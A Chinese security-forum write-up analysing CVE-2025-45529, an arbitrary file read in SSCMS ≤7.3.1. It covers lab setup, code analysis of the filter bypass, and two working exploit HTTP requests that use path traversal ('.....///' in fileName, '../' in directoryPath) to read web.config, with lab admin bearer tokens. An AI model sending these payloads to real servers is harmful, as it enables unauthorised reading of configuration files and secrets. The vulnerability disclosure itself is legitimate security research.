奇安信攻防社区-CVE-2025-45529 sscms存在任意文件读取漏洞分析

CVE-2025-45529 sscms存在任意文件读取漏洞分析

SSCMS 内容管理系统是基于微软 .NET Core 平台开发，本文将对其CVE-2025-45529分析

一、漏洞简介
======

ReadTextAsynchronous 是一个文件读取函数。点击“PathUtils”中的“Removed ParentPath”，发现存在过滤,并且可以绕过

二、影响版本
======

&lt;=v7.3.1

三、环境搭建
======

搭建教程：

安装IIS

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-bdb8a9648478e791ba72bf63e979f54b6018b36a.png)  
然后选择角色服务

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-091dc8b3c8d01afdb2411618da93e3e56badc79e.png)  
IIS 配置完毕后需要安装 .NET Core 托管捆绑包  
![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-30f761d38441af82a7306d87f8729d442358a28b.png)  
然后配置

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-8a9506051dbcc0ace590186937fbd39fabd8d20f.png)  
![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-0ec3d9afb4b73b6fbab65938f461e453a53776c7.png)  
配置应用程序池为无托管代码  
![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-433c6c65d7f8b584b9966109c408d0138907f394.png)  
这里会有一个报错：

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-c97147088f0ad3e5be3ab473d1db3c14f78d646d.png)

笔者删除了web.comfig的内容

打开 Web.config 文件，将

```xml
<modules>  
<remove name="WebDAVModule" />  
</modules>

```

以及

```xml
<remove name="WebDAV" />
```

删除，重启 IIS 服务即可。

搭建成功：

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-41200e1c807f03140e56fe22a1378b4ffbe35622.png)

四、漏洞原理分析
========

SSCMS 内容管理系统基于微软 .NET Core 平台开发，用于创建在 Windows、Linux、Mac 以及 Docker 上运行的 Web 应用程序和服务。

根据漏洞点定位到/cms/templates/templatesAssetsEditor路由下，然后发现该路由的目录就是/api/admin/cms/templates/templatesAssetsEditor

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-20baafa5e4cff8e41d9da19dc42a45f252d0462e.png)  
然后发现该路由存在四个可控参数分别为:SiteId、DirectoryPath、FileName、FileType

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-d9b9ed97aba40b9f3fa1ab0f1f267f2d13bddbec.png)  
`ReadTextAsync` 函数，是用于**异步读取文件内容**的方法，因此我们控制filePath的话就可以进行任意文件读取  
但是这里存在一个过滤`string fileName = PathUtils.RemoveParentPath(request.FileName);`  
![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-7c6b25824b841e5791c8f78d1ae96fee4ba60c47.png)

点进`PathUtils.RemoveParentPath`发现

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-013bdc84f4bc8c06e899a1b010583afcdc2fb3bb.png)  
这里过滤可以进行绕过

写一个脚本，发现该过滤可以进行测试绕过

```shell
import sys

while True:

path = input("请输入路径 (输入 'q' 退出): ")

if path.lower() == 'q':
        break

retVal = path.replace("../", "")
    retVal = retVal.replace("..\\", "")
    retVal = retVal.replace("./", "")
    retVal = retVal.replace(".\\", "")

print("过滤后的路径:", retVal)

```

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-e7a5c31786942aa6cc2dddafef6baddb5d4c06fa.png)

然后进行拼接.....///.....///进行任意文件读取

五、漏洞复现
======

exp:

```shell
GET /api/admin/cms/templates/templatesAssetsEditor?directoryPath=&amp;fileName=.....///.....///.....///.....///.....///.....///www/sscms/web.config&amp;fileType=html&amp;siteId=1 HTTP/1.1
Host: 192.168.202.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNzQyMjg5NjcxLCJleHAiOjE3NDIzNzYwNzEsImlhdCI6MTc0MjI4OTY3MX0.p0B6elCBkgsVoOO8AaW524HsKMceoGQBkvBh8zXVWCg
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
```

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-a90bc418910307796145f20702de17083970c953.png)

这里笔者还有一个彩蛋，根据上面文章知道`fileName`参数经过了`RemoveParentPath`进行了一个过滤的操作，但是filepath这个参数是由site, directoryPath, fileName这三个拼接构成的，但是上述代码只对于fileName进行过滤  
因此这里还存在第二种绕过方式，直接通过控制directoryPath参数实现任意文件读取。  
exp:

```php
GET /api/admin/cms/templates/templatesAssetsEditor?directoryPath=../../../../../&amp;fileName=www/sscms/web.config&amp;fileType=html&amp;siteId=1 HTTP/1.1  
Host: 192.168.202.134  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0  
Accept: application/json, text/plain, */*  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNzQyMjk3MjAzLCJleHAiOjE3NDIzODM2MDMsImlhdCI6MTc0MjI5NzIwM30.yE5-ratuYoip4CXvcN3UHds72Su0vAGfKyZg9IWz-vY  
Connection: close  
Referer: http://192.168.202.134/ss-admin/?siteId=1
```

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-49f59b56a425bb48555e64075a4bfc789a01c042.png)

六、总结
====

该漏洞形成的原因是由于过滤不严，导致还可以进行骚操作绕过

发表于 2025-06-05 15:00:01
阅读 ( 373 )
分类：CMS

CVE-2025-45529 sscms存在任意文件读取漏洞分析

0 条评论